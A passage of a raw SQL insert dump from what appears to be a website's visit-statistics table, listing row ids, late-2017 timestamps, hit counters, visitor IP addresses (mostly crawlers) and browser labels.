1514319612,1,1,0,0,'54.36.148.156','other'),(191124,1514319630,1,1,0,0,'54.36.148.178','other'),(191125,1514319863,1,1,0,0,'77.111.244.23','chrome'),(191126,1514319999,1,1,0,0,'54.36.148.87','other'),(191127,1514320558,1,1,0,0,'178.154.171.88','other'),(191128,1514320751,1,1,0,0,'54.36.148.24','other'),(191129,1514320808,1,1,0,0,'54.36.148.114','other'),(191130,1514320867,1,1,0,0,'54.36.148.23','other'),(191131,1514320876,1,1,0,0,'8.29.198.27','other'),(191132,1514321006,1,1,0,0,'54.36.149.87','other'),(191133,1514321755,1,1,0,0,'54.36.149.0','other'),(191134,1514321863,1,1,0,0,'54.36.148.160','other'),(191135,1514321999,1,1,0,0,'51.255.71.126','other'),(191136,1514322265,2,2,0,0,'54.36.148.201','other'),(191137,1514322266,1,1,0,0,'54.36.149.30','other'),(191138,1514322306,1,1,0,0,'54.36.149.91','other'),(191139,1514322332,1,1,0,0,'54.36.148.247','other'),(191140,1514322635,1,1,0,0,'54.36.148.57','other'),(191141,1514322719,1,1,0,0,'54.36.149.67','other'),(191142,1514323435,1,1,0,0,'54.36.148.72','other'),(191143,1514323461,1,1,0,0,'54.36.148.166','other'),(191144,1514323538,1,1,0,0,'54.36.148.14','other'),(191145,1514323869,1,1,0,0,'54.36.148.130','other'),(191146,1514323873,1,1,0,0,'207.46.13.39','other'),(191147,1514323996,1,1,0,0,'54.36.148.124','other'),(191148,1514324434,1,1,0,0,'54.36.148.160','other'),(191149,1514324724,1,1,0,0,'54.36.148.45','other'),(191150,1514324804,1,1,0,0,'157.55.39.101','other'),(191151,1514324808,2,2,0,0,'207.46.13.129','other'),(191152,1514325157,1,1,0,0,'54.36.148.200','other'),(191153,1514325233,1,1,0,0,'54.36.148.240','other'),(191154,1514325571,1,1,0,0,'54.36.149.84','other'),(191155,1514325875,1,1,0,0,'217.69.136.208','other'),(191156,1514325984,1,1,0,0,'54.36.148.185','other'),(191157,1514326520,2,2,0,0,'207.46.13.129','other'),(191158,1514326656,1,1,0,0,'95.132.45.122','chrome'),(191159,1514326910,1,1,0,0,'54.36.148.85','other'),(191160,1514326995,1,1,0,0,'54.36.148.109','other'),(191161,1514326996,1,1,0,0,'54.36.148.120','other'),(191162,1514327010,1,1,0,0,'51.255.71.117','other'),(191163,1514327012,1,1,0,0,'54.36.149.78','other'),(191164,1514327231,1,1,0,0,'54.36.148.194','other'),(191165,1514327427,1,1,0,0,'54.36.148.18','other'),(191166,1514327987,3,3,0,0,'157.55.39.203','other'),(191167,1514328415,1,1,0,0,'54.36.148.94','other'),(191168,1514328621,1,1,0,0,'54.36.148.129','other'),(191169,1514328835,1,1,0,0,'54.36.148.43','other'),(191170,1514328989,1,1,0,0,'54.36.148.205','other'),(191171,1514329029,1,1,0,0,'54.36.148.27','other'),(191172,1514329130,1,1,0,0,'54.36.148.230','other'),(191173,1514329204,1,1,0,0,'54.36.148.244','other'),(191174,1514330088,1,1,0,0,'51.255.71.132','other'),(191175,1514330847,1,1,0,0,'54.36.149.22','other'),(191176,1514330880,1,1,0,0,'54.36.149.6','other'),(191177,1514331118,1,1,0,0,'51.255.71.121','other'),(191178,1514331518,1,1,0,0,'54.36.148.29','other'),(191179,1514331702,1,1,0,0,'8.29.198.25','other'),(191180,1514331762,1,1,0,0,'54.36.148.169','other'),(191181,1514331884,1,1,0,0,'54.36.149.67','other'),(191182,1514331896,1,1,0,0,'54.36.148.190','other'),(191183,1514331942,1,1,0,0,'54.36.148.148','other'),(191184,1514332085,1,1,0,0,'54.36.148.40','other'),(191185,1514332102,1,1,0,0,'54.36.148.13','other'),(191186,1514332240,1,1,0,0,'54.36.149.80','other'),(191187,1514332291,1,1,0,0,'54.36.148.245','other'),(191188,1514332628,1,1,0,0,'54.36.149.49','other'),(191189,1514332804,1,1,0,0,'54.36.148.23','other'),(191190,1514333027,1,1,0,0,'54.36.148.97','other'),(191191,1514333073,1,1,0,0,'54.36.149.105','other'),(191192,1514333185,1,1,0,0,'54.36.148.69','other'),(191193,1514333527,1,1,0,0,'54.36.148.117','other'),(191194,1514333533,1,1,0,0,'54.36.148.58','other'),(191195,1514334285,1,1,0,0,'54.36.149.4','other'),(191196,1514334512,1,1,0,0,'54.36.149.106','other'),(191197,1514334929,1,1,0,0,'54.36.148.117','other'),(191198,1514335181,1,1,0,0,'54.36.148.122','other'),(191199,1514335260,1,1,0,0,'54.36.149.8','other'),(191200,1514335387,1,1,0,0,'207.46.13.129','other'),(191201,1514335732,1,1,0,0,'54.36.148.119','other'),(191202,1514335815,1,0,1,0,'66.249.64.30',''),(191203,1514335996,1,1,0,0,'54.36.148.56','other'),(191204,1514336218,1,1,0,0,'141.8.142.74','other'),(191205,1514336276,1,1,0,0,'54.36.148.161','other'),(191206,1514336374,1,1,0,0,'54.36.149.90','other'),(191207,1514336376,1,1,0,0,'54.36.149.52','other'),(191208,1514336436,1,1,0,0,'54.36.148.195','other'),(191209,1514336485,1,1,0,0,'54.36.148.196','other'),(191210,1514336509,1,1,0,0,'54.36.149.0','other'),(191211,1514336515,1,1,0,0,'54.36.148.116','other'),(191212,1514336775,1,1,0,0,'54.36.149.1','other'),(191213,1514337224,1,1,0,0,'54.36.148.231','other'),(191214,1514337464,1,1,0,0,'51.255.71.125','other'),(191215,1514337539,1,1,0,0,'54.36.148.80','other'),(191216,1514337669,1,1,0,0,'54.36.149.29','other'),(191217,1514337689,1,1,0,0,'157.55.39.203','other'),(191218,1514337744,1,1,0,0,'54.36.148.133','other'),(191219,1514337852,1,1,0,0,'54.36.148.44','other'),(191220,1514337879,1,1,0,0,'54.36.148.30','other'),(191221,1514337959,1,1,0,0,'54.36.149.76','other'),(191222,1514338138,1,1,0,0,'54.36.148.129','other'),(191223,1514338233,1,1,0,0,'54.36.149.103','other'),(191224,1514338392,1,1,0,0,'54.36.148.235','other'),(191225,1514338699,1,0,1,0,'66.249.64.29',''),(191226,1514338979,1,1,0,0,'207.46.13.129','other'),(191227,1514339244,1,1,0,0,'157.55.39.203','other'),(191228,1514339409,1,1,0,0,'54.36.148.174','other'),(191229,1514339487,1,1,0,0,'207.46.13.39','other'),(191230,1514339602,1,1,0,0,'54.36.148.42','other'),(191231,1514339851,2,2,0,0,'54.36.149.20','other'),(191232,1514340135,1,1,0,0,'54.36.149.100','other'),(191233,1514340300,1,1,0,0,'54.36.148.28','other'),(191234,1514340318,1,0,1,0,'66.249.64.28',''),(191235,1514340362,1,1,0,0,'54.36.148.66','other'),(191236,1514340664,1,1,0,0,'54.36.149.51','other'),(191237,1514340953,1,1,0,0,'54.36.148.164','other'),(191238,1514341094,1,1,0,0,'109.173.25.162','msie'),(191239,1514341451,1,1,0,0,'54.36.148.160','other'),(191240,1514341627,1,1,0,0,'54.36.148.118','other'),(191241,1514341935,1,1,0,0,'178.255.215.94','other'),(191242,1514342100,1,1,0,0,'54.36.149.54','other'),(191243,1514342296,1,1,0,0,'54.36.148.13','other'),(191244,1514342528,1,1,0,0,'8.29.198.27','other'),(191245,1514343323,1,1,0,0,'54.36.148.56','other'),(191246,1514343467,1,1,0,0,'54.36.148.249','other'),(191247,1514343586,1,1,0,0,'157.55.39.203','other'),(191248,1514343807,1,1,0,0,'193.176.251.163','chrome'),(191249,1514343830,1,1,0,0,'54.36.148.133','other'),(191250,1514344084,1,1,0,0,'54.36.148.204','other'),(191251,1514344160,1,1,0,0,'54.36.148.13','other'),(191252,1514344260,1,0,1,0,'66.249.70.25',''),(191253,1514344293,1,1,0,0,'207.46.13.129','other'),(191254,1514344309,1,1,0,0,'54.36.148.248','other'),(191255,1514344365,1,1,0,0,'54.36.148.104','other'),(191256,1514344910,1,1,0,0,'54.36.148.143','other'),(191257,1514345032,1,1,0,0,'54.36.148.133','other'),(191258,1514345054,1,1,0,0,'54.36.149.52','other'),(191259,1514345209,1,1,0,0,'51.255.71.128','other'),(191260,1514345511,1,1,0,0,'54.36.149.93','other'),(191261,1514345574,1,1,0,0,'54.36.148.17','other'),(191262,1514345609,1,1,0,0,'54.36.149.45','other'),(191263,1514345896,1,1,0,0,'54.36.148.250','other'),(191264,1514345947,1,1,0,0,'54.36.149.29','other'),(191265,1514346247,1,1,0,0,'54.36.149.47','other'),(191266,1514346597,1,1,0,0,'207.46.13.129','other'),(191267,1514347068,1,1,0,0,'54.36.148.19','other'),(191268,1514347257,1,0,1,0,'66.249.64.29',''),(191269,1514347293,1,1,0,0,'54.36.148.77','other'),(191270,1514347416,1,1,0,0,'54.36.148.206','other'),(191271,1514347580,1,1,0,0,'54.36.149.78','other'),(191272,1514347772,1,1,0,0,'54.36.148.92','other'),(191273,1514347912,1,1,0,0,'54.36.149.38','other'),(191274,1514348375,1,1,0,0,'54.36.149.34','other'),(191275,1514348505,1,1,0,0,'207.46.13.129','other'),(191276,1514348932,1,1,0,0,'54.36.148.124','other'),(191277,1514349479,1,1,0,0,'54.36.149.72','other'),(191278,1514349563,1,1,0,0,'54.36.149.67','other'),(191279,1514349937,1,1,0,0,'54.36.148.62','other'),(191280,1514350039,1,1,0,0,'54.36.148.89','other'),(191281,1514350054,1,1,0,0,'5.164.70.207','chrome'),(191282,1514350078,1,1,0,0,'157.55.39.203','other'),(191283,1514350186,1,1,0,0,'54.36.148.229','other'),(191284,1514350244,1,1,0,0,'54.36.148.116','other'),(191285,1514350507,1,1,0,0,'54.36.149.27','other'),(191286,1514350659,1,1,0,0,'54.36.148.32','other'),(191287,1514351284,1,1,0,0,'207.46.13.129','other'),(191288,1514351323,1,0,1,0,'66.249.64.28',''),(191289,1514351586,1,1,0,0,'92.112.2.119','chrome'),(191290,1514351851,1,1,0,0,'54.36.149.96','other'),(191291,1514351856,1,1,0,0,'51.255.71.128','other'),(191292,1514351885,1,1,0,0,'54.36.148.194','other'),(191293,1514352117,1,1,0,0,'54.36.148.51','other'),(191294,1514352131,2,2,0,0,'157.55.39.203','other'),(191295,1514352344,1,1,0,0,'54.36.149.37','other'),(191296,1514352729,1,1,0,0,'91.196.178.97','chrome'),(191297,1514352780,1,1,0,0,'54.36.149.20','other'),(191298,1514352810,1,1,0,0,'54.36.149.82','other'),(191299,1514353184,1,1,0,0,'54.36.148.154','other'),(191300,1514353300,1,0,1,0,'66.249.64.28',''),(191301,1514353302,1,1,0,0,'54.36.148.168','other'),(191302,1514353345,1,1,0,0,'54.36.148.254','other'),(191303,1514353357,1,1,0,0,'8.29.198.26','other'),(191304,1514353523,1,1,0,0,'54.36.148.109','other'),(191305,1514354220,1,1,0,0,'54.36.148.130','other'),(191306,1514354330,1,1,0,0,'54.36.149.20','other'),(191307,1514354339,1,1,0,0,'54.36.148.44','other'),(191308,1514354876,1,1,0,0,'207.46.13.39','other'),(191309,1514354923,1,1,0,0,'54.36.148.54','other'),(191310,1514355298,1,1,0,0,'54.36.148.149','other'),(191311,1514355476,1,1,0,0,'54.36.149.15','other'),(191312,1514355599,1,1,0,0,'95.28.203.74','chrome'),(191313,1514355989,1,1,0,0,'91.196.178.68','chrome'),(191314,1514356134,1,1,0,0,'54.36.148.118','other'),(191315,1514356255,1,1,0,0,'54.36.148.71','other'),(191316,1514356267,1,1,0,0,'46.200.75.98','firefox'),(191317,1514356345,1,1,0,0,'54.36.149.47','other'),(191318,1514356424,1,1,0,0,'54.36.148.95','other'),(191319,1514356470,1,1,0,0,'54.36.149.104','other'),(191320,1514356824,1,1,0,0,'176.118.51.6','other'),(191321,1514356864,1,1,0,0,'54.36.149.69','other'),(191322,1514356973,1,1,0,0,'54.36.148.74','other'),(191323,1514357162,1,1,0,0,'54.36.149.57','other'),(191324,1514357222,1,1,0,0,'54.36.148.238','other'),(191325,1514357413,1,1,0,0,'54.36.148.78','other'),(191326,1514357426,2,2,0,0,'157.55.39.203','other'),(191327,1514357610,1,1,0,0,'91.196.178.70','firefox'),(191328,1514358411,1,1,0,0,'51.255.71.129','other'),(191329,1514358438,1,1,0,0,'217.69.133.60','other'),(191330,1514358448,1,0,1,0,'66.249.64.28',''),(191331,1514358766,1,1,0,0,'54.36.148.100','other'),(191332,1514358775,1,1,0,0,'66.249.70.29','chrome'),(191333,1514358780,1,1,0,0,'54.36.148.254','other'),(191334,1514358810,1,1,0,0,'54.36.148.89','other'),(191335,1514358840,1,1,0,0,'54.36.148.30','other'),(191336,1514359116,1,1,0,0,'77.111.244.10','chrome'),(191337,1514359172,1,1,0,0,'54.36.149.52','other'),(191338,1514359206,1,1,0,0,'141.8.142.74','other'),(191339,1514359218,1,1,0,0,'54.36.148.165','other'),(191340,1514359293,1,1,0,0,'91.196.178.68','chrome'),(191341,1514359431,1,1,0,0,'95.133.27.162','chrome'),(191342,1514359576,1,1,0,0,'54.36.148.10','other'),(191343,1514359829,1,1,0,0,'54.36.149.30','other'),(191344,1514359858,1,1,0,0,'54.36.149.66','other'),(191345,1514360077,18,18,0,0,'37.187.75.71','other'),(191346,1514360213,1,1,0,0,'54.36.148.186','other'),(191347,1514360323,1,1,0,0,'54.36.148.63','other'),(191348,1514360586,1,1,0,0,'94.178.115.246','firefox'),(191349,1514360887,1,1,0,0,'91.196.178.131','firefox'),(191350,1514360920,2,2,0,0,'157.55.39.203','other'),(191351,1514361224,1,1,0,0,'77.111.244.13','chrome'),(191352,1514361307,1,1,0,0,'54.36.148.33','other'),(191353,1514361374,1,1,0,0,'195.230.119.34','chrome'),(191354,1514361779,1,1,0,0,'95.24.151.174','msie'),(191355,1514361873,1,1,0,0,'207.46.13.129','other'),(191356,1514361874,1,1,0,0,'157.55.39.203','other'),(191357,1514361896,1,1,0,0,'54.36.149.95','other'),(191358,1514361916,1,1,0,0,'5.153.140.141','chrome'),(191359,1514361923,1,1,0,0,'54.36.148.164','other'),(191360,1514362068,1,1,0,0,'54.36.148.188','other'),(191361,1514362122,1,1,0,0,'141.8.142.74','other'),(191362,1514362200,1,1,0,0,'91.196.178.70','chrome'),(191363,1514362206,1,1,0,0,'37.73.156.236','chrome'),(191364,1514362289,1,1,0,0,'40.77.167.180','other'),(191365,1514362992,4,4,0,0,'213.108.46.227','other'),(191366,1514363052,1,1,0,0,'54.36.148.67','other'),(191367,1514363136,1,1,0,0,'54.36.149.23','other'),(191368,1514363169,1,1,0,0,'54.36.149.24','other'),(191369,1514363242,1,1,0,0,'54.36.149.51','other'),(191370,1514363364,1,1,0,0,'91.196.178.134','chrome'),(191371,1514363394,1,1,0,0,'54.36.148.51','other'),(191372,1514363484,1,1,0,0,'51.255.71.129','other'),(191373,1514363556,1,1,0,0,'207.46.13.112','other'),(191374,1514363974,3,3,0,0,'213.108.46.227','other'),(191375,1514364030,1,0,1,0,'66.249.64.28',''),(191376,1514364137,1,1,0,0,'130.180.217.20','chrome'),(191377,1514364181,1,1,0,0,'8.29.198.25','other'),(191378,1514364307,1,1,0,0,'54.36.148.78','other'),(191379,1514364511,1,1,0,0,'46.133.14.117','chrome'),(191380,1514364613,1,1,0,0,'54.36.149.88','other'),(191381,1514364689,1,1,0,0,'66.249.64.29','chrome'),(191382,1514364775,1,1,0,0,'54.36.148.250','other'),(191383,1514364949,1,1,0,0,'37.55.1.37','chrome'),(191384,1514365064,4,4,0,0,'208.83.1.168','chrome'),(191385,1514365066,7,7,0,0,'208.83.1.168','other'),(191386,1514365067,2,2,0,0,'208.83.1.168','firefox'),(191387,1514365207,4,4,0,0,'213.108.46.227','other'),(191388,1514365235,1,1,0,0,'54.36.148.12','other'),(191389,1514365386,1,1,0,0,'207.46.13.129','other'),(191390,1514365527,1,1,0,0,'178.154.171.88','other'),(191391,1514365698,1,1,0,0,'37.110.66.106','chrome'),(191392,1514365765,1,1,0,0,'54.36.149.45','other'),(191393,1514365844,2,2,0,0,'207.46.13.112','other'),(191394,1514365988,1,1,0,0,'54.36.148.158','other'),(191395,1514366168,1,1,0,0,'54.36.149.36','other'),(191396,1514366228,1,1,0,0,'54.36.149.53','other'),(191397,1514366232,3,3,0,0,'213.108.46.227','other'),(191398,1514366464,1,1,0,0,'141.8.142.74','other'),(191399,1514366652,1,1,0,0,'78.111.190.39','chrome'),(191400,1514366764,1,1,0,0,'54.36.148.100','other'),(191401,1514366780,1,1,0,0,'54.36.149.81','other'),(191402,1514366790,1,1,0,0,'54.36.148.233','other'),(191403,1514366795,1,1,0,0,'54.36.148.122','other'),(191404,1514366887,1,0,1,0,'66.249.64.30',''),(191405,1514366914,1,1,0,0,'51.255.71.116','other'),(191406,1514366920,1,1,0,0,'87.250.224.46','other'),(191407,1514367166,3,3,0,0,'213.108.46.227','other'),(191408,1514367244,1,0,1,0,'66.249.64.28',''),(191409,1514367287,1,0,1,0,'66.249.64.29',''),(191410,1514367365,1,1,0,0,'91.196.178.168','chrome'),(191411,1514367513,1,1,0,0,'91.196.177.44','chrome'),(191412,1514367600,1,1,0,0,'54.36.148.159','other'),(191413,1514367602,1,1,0,0,'54.36.149.44','other'),(191414,1514368190,1,1,0,0,'94.179.41.210','chrome'),(191415,1514368334,4,4,0,0,'213.108.46.227','other'),(191416,1514368435,1,1,0,0,'51.255.71.129','other'),(191417,1514368513,1,1,0,0,'54.36.148.202','other'),(191418,1514368637,1,1,0,0,'54.36.149.83','other'),(191419,1514368649,1,1,0,0,'141.8.142.74','other'),(191420,1514369294,1,1,0,0,'46.200.96.89','firefox'),(191421,1514369432,1,1,0,0,'54.36.148.86','other'),(191422,1514369520,1,1,0,0,'54.36.148.172','other'),(191423,1514369782,1,1,0,0,'54.36.148.136','other'),(191424,1514369908,1,1,0,0,'54.36.149.26','other'),(191425,1514369941,1,1,0,0,'54.36.148.77','other'),(191426,1514370035,1,1,0,0,'54.36.149.91','other'),(191427,1514370275,1,1,0,0,'54.36.148.146','other'),(191428,1514370304,1,1,0,0,'54.36.149.84','other'),(191429,1514370717,1,1,0,0,'54.36.148.53','other'),(191430,1514371285,1,1,0,0,'93.74.41.90','chrome'),(191431,1514371563,1,1,0,0,'54.36.149.11','other'),(191432,1514371570,1,1,0,0,'54.36.149.0','other'),(191433,1514371783,1,1,0,0,'54.36.148.116','other'),(191434,1514371806,1,1,0,0,'207.46.13.129','other'),(191435,1514372036,1,1,0,0,'54.36.149.82','other'),(191436,1514372043,1,1,0,0,'54.36.148.241','other'),(191437,1514372174,1,1,0,0,'54.36.149.30','other'),(191438,1514372458,1,1,0,0,'54.36.149.55','other'),(191439,1514372857,1,1,0,0,'54.36.148.106','other'),(191440,1514372887,1,1,0,0,'37.9.113.182','other'),(191441,1514372910,1,1,0,0,'54.36.149.50','other'),(191442,1514373237,1,1,0,0,'54.36.149.33','other'),(191443,1514373249,1,1,0,0,'54.36.148.194','other'),(191444,1514373251,1,1,0,0,'217.69.133.13','other'),(191445,1514373355,1,1,0,0,'178.154.171.88','other'),(191446,1514373370,1,1,0,0,'54.36.148.67','other'),(191447,1514373530,1,1,0,0,'54.36.148.151','other'),(191448,1514373579,1,1,0,0,'54.36.148.40','other'),(191449,1514374026,1,1,0,0,'54.36.148.41','other'),(191450,1514374072,1,1,0,0,'54.36.148.26','other'),(191451,1514374231,1,1,0,0,'91.196.178.167','chrome'),(191452,1514374493,1,1,0,0,'54.36.149.103','other'),(191453,1514374818,1,1,0,0,'54.36.148.132','other'),(191454,1514375004,1,1,0,0,'8.29.198.25','other'),(191455,1514375056,1,1,0,0,'141.8.142.74','other'),(191456,1514375088,1,1,0,0,'54.36.148.24','other'),(191457,1514375235,1,0,1,0,'66.249.64.28',''),(191458,1514375603,4,4,0,0,'173.208.200.154','other'),(191459,1514375683,1,1,0,0,'54.36.148.187','other'),(191460,1514376015,1,1,0,0,'91.196.178.163','chrome'),(191461,1514376201,1,1,0,0,'54.36.148.90','other'),(191462,1514376221,1,1,0,0,'54.36.148.96','other'),(191463,1514376369,1,1,0,0,'176.193.188.146','msie'),(191464,1514376493,1,1,0,0,'40.77.167.180','other'),(191465,1514376675,1,1,0,0,'54.36.148.151','other'),(191466,1514376714,1,1,0,0,'54.36.148.29','other'),(191467,1514376727,1,1,0,0,'51.255.71.113','other'),(191468,1514377018,1,1,0,0,'54.36.149.16','other'),(191469,1514377065,1,0,1,0,'66.249.70.25',''),(191470,1514377317,1,1,0,0,'54.36.148.238','other'),(191471,1514377449,1,1,0,0,'157.55.39.203','other'),(191472,1514377964,1,1,0,0,'54.36.149.41','other'),(191473,1514378079,1,0,1,0,'66.249.64.28',''),(191474,1514378193,1,1,0,0,'178.154.200.32','other'),(191475,1514378310,1,1,0,0,'54.36.148.202','other'),(191476,1514378350,1,1,0,0,'54.36.148.185','other'),(191477,1514378502,1,1,0,0,'54.36.148.87','other'),(191478,1514378553,1,1,0,0,'54.36.149.94','other'),(191479,1514379108,1,1,0,0,'54.36.148.126','other'),(191480,1514379387,1,1,0,0,'54.36.148.250','other'),(191481,1514379505,1,1,0,0,'54.36.148.202','other'),(191482,1514379732,1,1,0,0,'207.46.13.129','other'),(191483,1514379931,1,1,0,0,'54.36.148.95','other'),(191484,1514380043,1,1,0,0,'54.36.148.116','other'),(191485,1514380616,2,2,0,0,'92.113.38.99','chrome'),(191486,1514380813,1,1,0,0,'37.53.246.194','chrome'),(191487,1514380885,1,1,0,0,'54.36.148.161','other'),(191488,1514381151,1,1,0,0,'95.133.27.154','chrome'),(191489,1514381181,1,1,0,0,'54.36.148.243','other'),(191490,1514381200,1,1,0,0,'54.36.148.162','other'),(191491,1514381293,1,1,0,0,'54.36.149.91','other'),(191492,1514381298,1,1,0,0,'54.36.148.177','other'),(191493,1514381335,1,1,0,0,'54.36.149.4','other'),(191494,1514381403,1,1,0,0,'54.36.149.98','other'),(191495,1514381467,1,1,0,0,'54.36.148.52','other'),(191496,1514381488,1,1,0,0,'54.36.148.11','other'),(191497,1514381547,1,1,0,0,'54.36.149.7','other'),(191498,1514381650,1,1,0,0,'54.36.148.238','other'),(191499,1514381781,1,1,0,0,'54.36.148.181','other'),(191500,1514382107,1,1,0,0,'54.36.148.186','other'),(191501,1514382253,2,2,0,0,'207.46.13.129','other'),(191502,1514382413,2,2,0,0,'54.36.149.87','other'),(191503,1514382559,1,1,0,0,'54.36.148.128','other'),(191504,1514382965,1,1,0,0,'54.36.149.85','other'),(191505,1514383030,1,1,0,0,'54.36.148.12','other'),(191506,1514383038,1,1,0,0,'95.132.59.246','chrome'),(191507,1514383060,1,1,0,0,'54.36.148.150','other'),(191508,1514383083,1,1,0,0,'54.36.148.242','other'),(191509,1514383342,1,1,0,0,'37.54.21.180','chrome'),(191510,1514383385,1,1,0,0,'54.36.148.43','other'),(191511,1514383631,1,1,0,0,'54.36.148.168','other'),(191512,1514383941,1,1,0,0,'54.36.148.85','other'),(191513,1514383994,1,1,0,0,'54.36.148.230','other'),(191514,1514384025,1,1,0,0,'40.77.167.180','other'),(191515,1514384242,1,1,0,0,'54.36.148.198','other'),(191516,1514384257,1,1,0,0,'54.36.149.96','other'),(191517,1514384289,1,1,0,0,'176.124.232.37','chrome'),(191518,1514384336,1,1,0,0,'37.54.21.180','chrome'),(191519,1514384397,1,1,0,0,'193.107.111.3','chrome'),(191520,1514384583,1,1,0,0,'91.202.144.27','chrome'),(191521,1514384794,1,1,0,0,'54.36.148.201','other'),(191522,1514384989,1,1,0,0,'54.36.149.103','other'),(191523,1514385035,1,1,0,0,'54.36.148.52','other'),(191524,1514385045,1,1,0,0,'54.36.148.100','other'),(191525,1514385060,1,1,0,0,'217.69.133.241','other'),(191526,1514385227,1,1,0,0,'54.36.148.114','other'),(191527,1514385353,1,1,0,0,'54.36.148.57','other'),(191528,1514385377,1,1,0,0,'54.36.148.246','other'),(191529,1514385578,1,1,0,0,'54.36.149.64','other'),(191530,1514385599,1,1,0,0,'54.36.149.71','other'),(191531,1514385631,1,1,0,0,'46.211.159.211','chrome'),(191532,1514385657,1,1,0,0,'54.36.148.242','other'),(191533,1514385663,1,1,0,0,'54.36.148.90','other'),(191534,1514385744,1,1,0,0,'54.36.149.106','other'),(191535,1514385830,1,1,0,0,'8.29.198.26','other'),(191536,1514385890,1,1,0,0,'40.77.167.58','other'),(191537,1514386023,1,1,0,0,'54.36.148.147','other'),(191538,1514386121,1,1,0,0,'54.36.149.31','other'),(191539,1514386317,1,1,0,0,'91.196.178.130','chrome'),(191540,1514386522,1,1,0,0,'37.54.21.180','chrome'),(191541,1514386785,1,1,0,0,'54.36.149.64','other'),(191542,1514386869,2,2,0,0,'54.36.148.95','other'),(191543,1514386966,1,1,0,0,'51.255.71.126','other'),(191544,1514387180,3,3,0,0,'207.46.13.112','other'),(191545,1514387426,1,1,0,0,'141.8.142.74','other'),(191546,1514387560,1,1,0,0,'66.249.70.27','chrome'),(191547,1514387634,1,0,1,0,'66.249.64.28',''),(191548,1514387738,1,1,0,0,'54.36.148.43','other'),(191549,1514387794,1,1,0,0,'80.77.34.72','chrome'),(191550,1514388314,1,1,0,0,'188.191.238.11','firefox'),(191551,1514389112,1,1,0,0,'207.46.13.129','other'),(191552,1514389332,1,1,0,0,'66.249.64.30','chrome'),(191553,1514389719,1,1,0,0,'157.55.39.203','other'),(191554,1514389743,2,2,0,0,'40.77.167.58','other'),(191555,1514390140,1,1,0,0,'178.154.171.88','other'),(191556,1514391027,1,1,0,0,'157.55.39.203','other'),(191557,1514391029,1,1,0,0,'207.46.13.129','other'),(191558,1514392468,1,1,0,0,'207.46.13.129','other'),(191559,1514392651,1,1,0,0,'91.196.178.70','firefox'),(191560,1514393093,1,1,0,0,'199.58.86.211','other'),(191561,1514393140,1,1,0,0,'157.55.39.203','other'),(191562,1514393639,1,1,0,0,'141.8.142.74','other'),(191563,1514394750,1,1,0,0,'157.55.39.203','other'),(191564,1514396038,1,1,0,0,'91.196.178.70','firefox'),(191565,1514396657,1,1,0,0,'8.29.198.26','other'),(191566,1514397390,1,1,0,0,'157.55.39.203','other'),(191567,1514397537,1,0,1,0,'66.249.64.30',''),(191568,1514397544,1,0,1,0,'66.249.64.29',''),(191569,1514397863,1,1,0,0,'141.8.142.74','other'),(191570,1514398409,1,1,0,0,'40.77.167.58','other'),(191571,1514398456,1,0,1,0,'66.249.70.29',''),(191572,1514398460,1,0,1,0,'66.249.64.28',''),(191573,1514398994,1,1,0,0,'207.46.13.129','other'),(191574,1514399286,1,0,1,0,'66.249.64.29',''),(191575,1514399354,1,1,0,0,'66.249.64.29','chrome'),(191576,1514400055,1,1,0,0,'87.250.224.46','other'),(191577,1514400518,1,1,0,0,'141.8.142.74','other'),(191578,1514401653,1,1,0,0,'37.54.16.161','chrome'),(191579,1514402213,1,1,0,0,'66.249.70.25','chrome'),(191580,1514402464,1,1,0,0,'162.210.196.130','other'),(191581,1514402587,1,1,0,0,'141.8.142.74','other'),(191582,1514403424,1,1,0,0,'178.95.157.126','chrome'),(191583,1514403473,1,0,1,0,'66.249.64.28',''),(191584,1514403539,1,0,1,0,'66.249.64.30',''),(191585,1514403841,1,1,0,0,'207.46.13.129','other'),(191586,1514403852,1,1,0,0,'40.77.167.58','other'),(191587,1514403984,1,1,0,0,'66.249.64.29','chrome'),(191588,1514404789,1,1,0,0,'207.46.13.112','other'),(191589,1514405445,1,1,0,0,'207.46.13.129','other'),(191590,1514406505,1,0,1,0,'66.249.64.30',''),(191591,1514407312,1,1,0,0,'213.180.203.8','other'),(191592,1514407482,1,1,0,0,'8.29.198.27','other'),(191593,1514407859,1,1,0,0,'54.36.149.88','other'),(191594,1514408386,1,1,0,0,'95.220.71.161','chrome'),(191595,1514408516,1,1,0,0,'54.36.149.81','other'),(191596,1514408522,1,1,0,0,'54.36.149.4','other'),(191597,1514408540,1,1,0,0,'54.36.148.207','other'),(191598,1514408646,1,1,0,0,'54.36.148.89','other'),(191599,1514408881,1,1,0,0,'54.36.148.20','other'),(191600,1514409398,1,1,0,0,'54.36.149.95','other'),(191601,1514409498,1,1,0,0,'54.36.148.252','other'),(191602,1514409601,1,1,0,0,'54.36.148.250','other'),(191603,1514410091,1,1,0,0,'141.8.142.74','other'),(191604,1514410107,1,1,0,0,'54.36.148.87','other'),(191605,1514410147,1,1,0,0,'54.36.148.35','other'),(191606,1514410218,1,1,0,0,'180.76.15.139','other'),(191607,1514410318,1,1,0,0,'54.36.148.251','other'),(191608,1514410348,1,0,1,0,'66.249.64.28',''),(191609,1514410452,1,1,0,0,'54.36.148.176','other'),(191610,1514410507,1,1,0,0,'54.36.149.27','other'),(191611,1514410545,1,1,0,0,'54.36.148.198','other'),(191612,1514410759,1,1,0,0,'54.36.149.95','other'),(191613,1514410793,1,1,0,0,'54.36.148.180','other'),(191614,1514411029,1,1,0,0,'54.36.148.104','other'),(191615,1514411162,1,1,0,0,'54.36.148.85','other'),(191616,1514411307,1,1,0,0,'54.36.149.96','other'),(191617,1514411318,1,1,0,0,'54.36.149.16','other'),(191618,1514411701,1,1,0,0,'51.255.71.120','other'),(191619,1514411796,1,1,0,0,'213.180.203.7','other'),(191620,1514411964,1,1,0,0,'54.36.148.204','other'),(191621,1514412414,1,0,1,0,'66.249.64.29',''),(191622,1514412634,1,1,0,0,'54.36.148.165','other'),(191623,1514412783,1,1,0,0,'54.36.148.166','other'),(191624,1514412797,1,1,0,0,'54.36.148.48','other'),(191625,1514412812,1,1,0,0,'51.255.71.119','other'),(191626,1514413071,1,1,0,0,'178.154.171.88','other'),(191627,1514413425,1,1,0,0,'54.36.148.169','other'),(191628,1514413556,1,1,0,0,'207.46.13.112','other'),(191629,1514413788,1,1,0,0,'54.36.148.82','other'),(191630,1514414058,1,1,0,0,'54.36.148.44','other'),(191631,1514414146,1,1,0,0,'54.36.148.31','other'),(191632,1514414221,1,1,0,0,'54.36.148.22','other'),(191633,1514414923,1,1,0,0,'54.36.148.117','other'),(191634,1514414959,2,2,0,0,'54.36.148.198','other'),(191635,1514415232,1,1,0,0,'54.36.148.138','other'),(191636,1514415255,1,1,0,0,'54.36.148.111','othe